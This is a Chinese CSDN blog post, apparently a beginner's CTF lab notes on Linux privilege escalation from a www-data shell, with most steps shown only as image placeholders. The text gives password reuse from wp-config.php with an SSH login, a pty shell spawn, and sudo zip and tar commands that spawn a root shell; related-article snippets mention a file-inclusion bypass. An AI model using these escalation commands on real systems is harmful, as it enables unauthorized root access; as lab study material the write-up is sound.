小白学习CTF第十一天-web安全提权

最新推荐文章于 2024-01-09 15:10:23 发布
最新推荐文章于 2024-01-09 15:10:23 发布
阅读量1.7k 收藏 3
点赞数
文章标签: linux 安全 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbhh1139/article/details/105785295
版权

web安全提权

在这里插入图片描述

提权介绍

在这里插入图片描述
根据之前得到www-data权限,准备进行提权:
在这里插入图片描述

内核漏洞提权

在这里插入图片描述
在这里插入图片描述

明文root密码提权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

计划任务

在这里插入图片描述

密码复用

在这里插入图片描述

sudo -l
cd /home
cd zico
ls -alh(发现ssh隐藏文件,wordpress)
cd wordpress(挖掘配置文件,发现wp-config.php)
cat wp-config.php(密码复用)
ssh zico@ip(远程登陆)
sWfCsfJSPV9H3AmQzw8
python -c "import pty;pty.spawn('/bin/bash')"
sudo -l(提权提示)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
ssh如果出现类似的警告:使用后面的处理办法。
在这里插入图片描述
mv /root/.ssh/known_hosts /tmp在这里插入图片描述
之后再次使用ssh登陆即可正常使用了。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

//利用zip进行提权
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"

//利用tar进行提权
sudo -u root tar cf /dev/null exploit -checkpoint=1 --checkpoint-action="/bin/bash"

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

获取flag

在这里插入图片描述

bbhh1139
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf&提权
m0_73973498的博客
11-25 581
SUID(Set User ID)是一种特殊权限,当用户执行具有SUID位的可执行文件时,该文件将以文件所有者的身份而不是执行者的身份运行。这允许普通用户在执行特定程序时获取特权权限。
项目三 探索并利用漏洞对未知web server权限提升(CTF实战 Kioptrix#2靶机渗透测试)
王先生的蒋小姐的博客
07-20 1344
大家好,我是SuieKa。此是实训项目三,要求根据未知靶机(Kioptrix#2)探索漏洞,并利用漏洞进行权限提升实验项目,希望对朋友们有所帮助。 树一、神器开路,对未知操作系统的全面扫描二、利用探索的漏洞获取shell三、权限提升并获取关键字(hiroshima) 所谓CTF:CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交
CTF中对web服务器各种提权姿势
weixin_30343157的博客
06-19 585
在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统提权包括使用溢出漏洞已及利用系统配置文件。 提权前提:   1.拿到低权限shell   2.被入侵机器上有nc,python,perl等常见linux下的工具   3.有权上传下载文件 1.利用内核漏洞通杀内核漏洞十分少见,因此我们先应对系统相关进行信息...
15.CTF-web安全提权
woo233的博客
09-29 1850
往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。提权前提:已经拿到低权shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有权限上传文件和下载文件。
CTFSHOW国赛复现-----Unzip(软连接利用)
qq_73767109的博客
06-04 2025
因为解压的目录更改了,所以要把解压文件所在目录放在var/www/html(因为html目录下是web环境)这样才能在解压shell文件时实现getshell。这里利用linux构造软连接使得上传文件指向到var/www/html目录下。接下来就是在var/www/html目录下上传一个shell文件就可以了。再上传该压缩包,因为解压后的目录同名所以会覆盖原指定目录。所以此时目录是var/www/html/cmd.php。在test的目录下创建一句话php文件。--symlinks表示压缩软连接。
hackmyvm:tron笔记
qq_51230014的博客
01-09 438
但是这里面有个特点,如果/etc/passwd中存放了密码,那么即使这个密码与shadow中不同,但是会优先使用/etc/passwd中的密码。登录遇到如下问题:根据命令行提示,将 /root/.ssh/known_hosts第8行删除即可。linux里与密码相关的文件有两个,/etc/passwd,/etc/shadow。对最下面一行解码,先base64,后Brainfuck,得到用户player。如下命令生成加密后的密码,记住输入的原始密码,一会儿切换到root要用到。寻找可以修改的敏感文件。
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF web安全经典例题讲解
10-22
综上所述,"CTF web安全经典例题讲解"是一个全面覆盖Web安全关键领域的学习资源,包括SQL注入的检测与防御、密码学基础应用、文件上传漏洞的识别与修复、Web权限提升的防范以及抓包改包技巧的实践。对于希望在网络...
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
通过"CTF-Web-Challenge",你可以通过实际的场景来学习这些概念,提高在Web安全领域的技能。挑战可能包括编写代码、解密信息、寻找隐藏的文件或漏洞等。完成这些挑战将加深你对PHP和Web安全的理解,并使你能够更好地...
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
CTF-提权
su__xiaoyan的博客
01-06 2018
提权 通过Web服务拿下服务器的基础权限以后(www-data),如何提权值最高的系统权限(root)。 提权的前提条件: 获取服务器的基础权限。 能上传或者下载文件。 靶机上面有常见工具或者环境,例如nc,python或者Perl。 Linux操作系统提权方法: 利用内核漏洞进行提权 利用错误的系统配置进行提权 明文密码提权 计划任务提权 密码复用提权 内核漏洞提权 首先查看系统Linux的发行版本: cat /etc/issue cat /etc/*-release 查看内核版本
完成ubuntu-ctf靶机渗透 最终提权得到shell权限
m0_60319766的博客
02-17 4199
完成ubuntu-ctf靶机渗透 最终提权得到shell权限
2022第五空间WEB&MISC
羽的博客
09-19 2204
CTF
-------已搬运--BUUCTF:[SWPU2019]Web3 --- jwt 的secret的获取 --- unzip的软练级攻击
Zero_Adam的博客
04-20 1171
目录:000、知识点1.os.path.dirname2. unzip 和下面这个zip一块的,没必要看,遇到题目的时候现搜就行。3. zipfile一、自己做:2.看一看WP二、学到的:三、 学习WP 重点,我感觉是 jwt 的 那块是个点, 有乱码之后要寻找secret,然后可用404来获取jwt的secret, 再是unzip的软连接攻击这个东西,以前没见过的。 学习一下Linux的软连接,然后再来修改修改 000、知识点 1.os.path.dirname python3 获取当前路径及os.pat
攻防世界-web-ctf 1
qq_43734081的博客
04-20 1034
工控云管理系统客服中心期待您的反馈 工控云管理系统客服中心存在漏洞,flag就在flag/flag/flag/flag/flag/flag/flag.php文件里面 http://47.104.188.226:20001 请找到这个隐藏的文件,swp?不不不。。。再找找。。 emmmm,这个题也是源码泄漏… 以后拿到题目没思路先把可能泄漏源码的地方试一遍再说…. http://47.104.188...
BUUCTF [SWPU2019] Web3
Senimo
12-20 809
BUUCTF [SWPU2019] Web3 考点: 启动环境: 首先是一个登陆页面,标题为:CTF-Flask-Demo,推测其应为Flask所编写,尝试使用admin用户登陆: 用户名:admin、密码:admin,登陆成功: 又尝试了几个登陆密码,应该是没有验证,随便登陆 其中有文件上传功能,点击upload: 提示权限不足,考虑其为session判断权限,使用BurpSuite查看页面Cookie信息: 注:在Flask中,session是保存在Cookie中,也就是本地,所以可以直接读取其内
idekctf2022部分web
v2ish1yan的博客
01-26 1093
我爱idekctf!!!!有dockerfile真是太棒了因为实在不会前端,所以暂时只复现非xss的题目题目附件我都放在了。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值